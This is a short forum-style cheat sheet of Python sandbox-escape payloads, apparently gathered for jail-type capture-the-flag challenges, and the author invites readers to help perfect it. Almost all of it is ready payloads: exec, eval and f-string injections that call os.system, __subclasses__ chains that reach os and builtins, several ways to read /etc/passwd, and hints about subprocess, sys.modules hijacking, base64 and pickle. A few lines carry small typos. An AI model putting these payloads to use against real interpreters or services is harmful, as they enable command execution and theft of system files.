If you guys get any other tricks, please let me know, we can improve and perfect it, and forgive my poor english.
type 1: keywords
exec('import os ;os.system("ls")')
eval('__import__("os").system("ls")')
f'''{__import__('os').system('ls')}'''
[].__class__.__mro__[-1].__subclasses__()
_builtin__.open('/etc/passwd')
system('ls')
[].__class__.__base__.__subclasses__()[59]()._module.linecache.__dict__['o'+'s'].__dict__['sy'+'stem']('l'+'s') # only python2
[].__class__.__base__.__subclasses__()[59](linecache.getlines, '/etc/password')
[].__class__.__base__.__subclasses__()[59](exec, '("__import__("os").system("ls")")')
type 2: python lib
subprocess.Popen('ls')
os.popen('ls')
importlib
builtins.open('/etc/passwd')
linecache.getlines('/etc/passwd')
type 3: python import
__import
import
importlib
type 4: other
-
import sys sys.modules['NB']='/Users/mour/anaconda3/lib/python3.6/os.py' import NB
-
base64 deocde encode
-
pickle